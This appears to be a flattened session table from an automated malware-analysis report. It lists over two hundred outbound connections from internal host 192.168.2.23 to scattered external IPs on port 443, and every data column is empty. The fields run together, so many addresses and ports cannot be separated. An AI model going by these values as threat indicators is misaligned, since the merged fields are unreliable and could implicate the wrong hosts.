                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23905192.168.2.2344246177.178.108.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23906192.168.2.234336450.80.36.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23907192.168.2.2349736155.161.21.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23908192.168.2.2356726110.37.98.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23909192.168.2.2346904108.61.20.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23910192.168.2.235348450.205.95.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23911192.168.2.234111441.129.65.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23912192.168.2.2354864163.93.59.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23913192.168.2.235576288.123.253.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23914192.168.2.2354836205.170.204.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23915192.168.2.233697271.70.165.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23916192.168.2.2340148161.113.19.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23917192.168.2.23595969.59.185.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23918192.168.2.234524885.96.49.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23919192.168.2.234351694.212.50.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23920192.168.2.2348722190.250.174.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23921192.168.2.2342712131.93.193.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23922192.168.2.235950270.242.248.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23923192.168.2.2355742203.34.45.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23924192.168.2.2343848160.211.255.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23925192.168.2.2355938100.31.224.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23926192.168.2.234285470.21.31.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23927192.168.2.234288620.29.228.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23928192.168.2.2343070199.119.0.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23929192.168.2.233470818.107.114.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23930192.168.2.233620851.79.211.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23931192.168.2.235288248.6.241.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23932192.168.2.2345356179.161.183.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23933192.168.2.2355190167.91.31.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23934192.168.2.23573264.61.141.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23935192.168.2.235628834.173.165.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23936192.168.2.234759619.24.180.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23937192.168.2.2347806157.162.10.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23938192.168.2.2355864142.21.145.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23939192.168.2.2342878140.70.231.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23940192.168.2.2357626175.5.17.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23941192.168.2.2344122182.41.158.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23942192.168.2.2351374186.35.197.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23943192.168.2.2357932131.50.190.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23944192.168.2.2350870100.162.44.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23945192.168.2.235398468.112.230.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23946192.168.2.2350578117.52.217.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23947192.168.2.2356254117.134.231.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23948192.168.2.235750457.173.169.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23949192.168.2.235706486.173.234.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23950192.168.2.2351860115.141.76.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23951192.168.2.2349678203.201.34.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23952192.168.2.235056014.196.117.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23953192.168.2.2349874221.188.34.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23954192.168.2.234594261.235.134.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23955192.168.2.2339714113.160.59.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23956192.168.2.235396091.184.163.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23957192.168.2.2333066211.254.143.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23958192.168.2.2352294134.44.176.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23959192.168.2.235603019.11.120.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23960192.168.2.2334496173.115.82.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23961192.168.2.2339950212.4.156.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23962192.168.2.2343248200.111.132.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23963192.168.2.2359382144.160.136.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23964192.168.2.235849882.223.144.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23965192.168.2.235537247.201.77.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23966192.168.2.234150676.190.21.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23967192.168.2.233311853.136.224.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23968192.168.2.2359914110.228.145.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23969192.168.2.2335130124.128.191.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23970192.168.2.233832246.7.61.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23971192.168.2.2354626193.123.249.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23972192.168.2.2347986130.184.206.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23973192.168.2.2351494164.18.228.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23974192.168.2.235278845.122.5.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23975192.168.2.2334414148.41.252.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23976192.168.2.233903282.8.154.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23977192.168.2.2360902119.205.101.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23978192.168.2.2347518116.246.96.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23979192.168.2.233563039.92.210.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23980192.168.2.235828258.115.16.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23981192.168.2.2333242136.105.22.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23982192.168.2.2338810210.176.166.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23983192.168.2.2347696146.159.140.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23984192.168.2.2358704110.96.169.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23985192.168.2.234627461.200.215.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23986192.168.2.2353526138.24.112.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23987192.168.2.235401632.236.48.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23988192.168.2.2333818102.91.80.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23989192.168.2.235093268.255.120.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23990192.168.2.2345356140.71.69.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23991192.168.2.233534681.173.144.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23992192.168.2.2355088103.66.79.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23993192.168.2.2338802179.241.227.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23994192.168.2.234042824.72.2.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23995192.168.2.2358370142.115.215.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23996192.168.2.2343086147.202.33.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23997192.168.2.234050642.132.48.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23998192.168.2.234905079.237.75.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23999192.168.2.2358042110.109.158.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24000192.168.2.2360036129.97.99.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24001192.168.2.2335490113.144.181.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24002192.168.2.234029460.193.151.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24003192.168.2.2357862162.248.84.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24004192.168.2.2357182106.188.24.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24005192.168.2.2337734190.212.144.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24006192.168.2.233797462.48.63.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24007192.168.2.2344734120.107.94.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24008192.168.2.2337440114.125.64.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24009192.168.2.235359247.249.184.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24010192.168.2.2346752178.165.216.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24011192.168.2.2334360203.155.34.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24012192.168.2.2354460203.3.27.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24013192.168.2.2336300172.6.44.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24014192.168.2.2349638190.40.40.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24015192.168.2.2347678160.222.117.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24016192.168.2.2358524155.197.161.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24017192.168.2.233855637.221.11.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24018192.168.2.2346606165.79.137.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24019192.168.2.2335252211.199.39.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24020192.168.2.2356528167.181.18.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24021192.168.2.2350916176.35.82.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24022192.168.2.2344196195.236.220.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24023192.168.2.2347980128.127.48.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24024192.168.2.234953664.223.154.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24025192.168.2.2345068138.243.45.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24026192.168.2.233657471.160.58.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24027192.168.2.2334232156.83.182.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24028192.168.2.233643088.51.203.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24029192.168.2.2342342148.54.195.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24030192.168.2.234393248.31.47.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24031192.168.2.23497305.250.112.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24032192.168.2.2340660110.74.198.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24033192.168.2.233606613.173.249.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24034192.168.2.2333396165.132.228.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24035192.168.2.2358854121.246.172.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24036192.168.2.234364072.86.30.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24037192.168.2.235188674.70.227.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24038192.168.2.234723285.213.150.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24039192.168.2.2352240161.190.38.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24040192.168.2.2342882116.214.203.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24041192.168.2.234037027.138.108.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24042192.168.2.234932285.255.57.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24043192.168.2.235265475.156.180.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24044192.168.2.2355664159.46.215.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24045192.168.2.234707890.33.28.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24046192.168.2.2337972142.153.63.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24047192.168.2.234869434.172.229.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24048192.168.2.235996279.144.92.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24049192.168.2.2348016144.130.194.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24050192.168.2.2355562200.253.181.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24051192.168.2.233383049.109.32.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24052192.168.2.2340558219.172.168.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24053192.168.2.234247679.34.169.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24054192.168.2.2345182168.39.18.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24055192.168.2.234423274.15.84.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24056192.168.2.2343718132.240.30.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24057192.168.2.2350778129.13.17.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24058192.168.2.2350160145.210.50.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24059192.168.2.2337982118.17.4.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24060192.168.2.2355266188.116.75.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24061192.168.2.2358778161.40.36.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24062192.168.2.2352784194.207.7.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24063192.168.2.2342480194.151.200.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24064192.168.2.2347632188.120.125.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24065192.168.2.2340464154.76.104.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24066192.168.2.2343224162.151.136.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24067192.168.2.2343638102.164.65.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24068192.168.2.2355730186.220.118.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24069192.168.2.2354486152.155.82.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24070192.168.2.2337454177.186.36.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24071192.168.2.2332962155.195.159.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24072192.168.2.23575109.13.49.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24073192.168.2.234643449.172.207.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24074192.168.2.2348914143.170.229.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24075192.168.2.235983044.52.67.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24076192.168.2.2337788222.28.84.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24077192.168.2.2360154153.191.64.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24078192.168.2.2334786115.180.126.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24079192.168.2.2354076137.165.140.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24080192.168.2.2350992198.191.61.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24081192.168.2.2357652204.89.38.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24082192.168.2.2353540114.36.229.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24083192.168.2.2358550106.158.116.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24084192.168.2.233745886.1.124.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24085192.168.2.2353626140.169.240.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24086192.168.2.234247236.98.152.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24087192.168.2.2336892199.55.72.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24088192.168.2.234488875.38.34.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24089192.168.2.234111272.69.106.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24090192.168.2.2351344163.57.159.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24091192.168.2.23539069.153.181.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24092192.168.2.2339342201.100.163.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24093192.168.2.233863644.158.104.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24094192.168.2.234852496.153.131.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24095192.168.2.2356788101.221.114.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24096192.168.2.2338076158.227.66.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24097192.168.2.2339582205.200.50.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24098192.168.2.234940445.153.30.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24099192.168.2.2355984158.196.136.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24100192.168.2.2357632206.198.9.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24101192.168.2.233945868.223.194.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24102192.168.2.234486262.48.179.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24103192.168.2.2341930167.90.255.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24104192.168.2.235756493.12.40.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24105192.168.2.235574473.93.158.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24106192.168.2.2357926203.141.14.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24107192.168.2.234772431.205.186.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24108192.168.2.2354520140.193.26.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24109192.168.2.234687481.174.128.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24110192.168.2.235762042.7.12.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24111192.168.2.2336664155.188.79.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24112192.168.2.235970651.223.189.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24113192.168.2.2342150143.16.84.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24114192.168.2.234111445.232.85.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24115192.168.2.235282683.138.41.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24116192.168.2.234510832.34.208.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24117192.168.2.235304086.227.25.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24118192.168.2.2360896211.90.124.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24119192.168.2.235137040.151.233.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24120192.168.2.2360070125.31.212.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24121192.168.2.2350780186.209.67.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24122192.168.2.2338232158.15.10.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24123192.168.2.2338380188.204.191.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24124192.168.2.23427445.118.82.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24125192.168.2.234361047.30.140.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
